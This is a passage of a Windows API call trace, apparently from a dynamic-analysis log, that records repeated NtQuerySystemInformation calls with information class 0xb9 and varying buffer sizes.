SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0272.136] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdb80, Length=0x50, ResultLength=0x0) [0272.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.137] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8e0, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd950, Length=0x28, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.139] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.140] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd9d0, Length=0x28, ResultLength=0x0) [0272.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd870, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd7f0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfdab0, Length=0x38, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd930, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0272.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd8c0, Length=0x20, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb00, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.148] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x50, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.149] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc750, Length=0x28, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7c0, Length=0x28, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0272.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x28, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6e0, Length=0x20, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc660, Length=0x20, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc920, Length=0x38, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7a0, Length=0x20, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc730, Length=0x20, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.157] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.165] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc40, Length=0x50, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x28, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca10, Length=0x28, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.173] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca90, Length=0x28, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc970, Length=0x20, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb70, Length=0x38, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9f0, Length=0x20, ResultLength=0x0) [0272.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x20, ResultLength=0x0) [0272.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.175] NtQuerySystemInformation 